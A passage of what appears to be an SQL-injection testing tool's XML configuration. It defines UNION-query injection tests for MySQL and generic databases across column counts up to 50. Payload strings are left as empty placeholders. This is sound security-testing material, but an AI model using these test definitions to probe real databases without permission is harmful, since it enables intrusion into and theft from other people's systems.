<title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
|
||||
<stype>3</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>[COLSTART]-[COLSTOP]</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
|
||||
<stype>3</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>NULL</char>
|
||||
<columns>[COLSTART]-[COLSTOP]</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
|
||||
<stype>3</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>[COLSTART]-[COLSTOP]</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>1-10</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query (NULL) - 1 to 10 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>NULL</char>
|
||||
<columns>1-10</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>1-10</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query ([CHAR]) - 11 to 20 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>11-20</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query (NULL) - 11 to 20 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>NULL</char>
|
||||
<columns>11-20</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>11-20</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query ([CHAR]) - 21 to 30 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>21-30</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query (NULL) - 21 to 30 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>NULL</char>
|
||||
<columns>21-30</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>21-30</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query ([CHAR]) - 31 to 40 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>31-40</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query (NULL) - 31 to 40 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>NULL</char>
|
||||
<columns>31-40</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>31-40</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query ([CHAR]) - 41 to 50 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>41-50</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query (NULL) - 41 to 50 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>NULL</char>
|
||||
<columns>41-50</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>#</comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>41-50</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
|
||||
<stype>3</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>[COLSTART]-[COLSTOP]</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
|
||||
<stype>3</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>NULL</char>
|
||||
<columns>[COLSTART]-[COLSTOP]</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
|
||||
<stype>3</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>[COLSTART]-[COLSTOP]</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>1-10</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query (NULL) - 1 to 10 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>NULL</char>
|
||||
<columns>1-10</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>1-10</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>11-20</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query (NULL) - 11 to 20 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>NULL</char>
|
||||
<columns>11-20</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>11-20</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>21-30</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query (NULL) - 21 to 30 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>NULL</char>
|
||||
<columns>21-30</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>21-30</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>31-40</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query (NULL) - 31 to 40 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>NULL</char>
|
||||
<columns>31-40</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>31-40</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>[CHAR]</char>
|
||||
<columns>41-50</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
<test>
|
||||
<title>Generic UNION query (NULL) - 41 to 50 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>NULL</char>
|
||||
<columns>41-50</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>
|
||||
<stype>3</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3,4,5</clause>
|
||||
<where>1</where>
|
||||
<vector>[UNION]</vector>
|
||||
<request>
|
||||
<payload/>
|
||||
<comment>-- </comment>
|
||||
<char>[RANDNUM]</char>
|
||||
<columns>41-50</columns>
|
||||
</request>
|
||||
<response>
|
||||
<union/>
|
||||
</response>
|
||||
</test>
|
||||
<!-- End of UNION query tests -->
|
||||
</root>
|
Loading…
Reference in New Issue
Block a user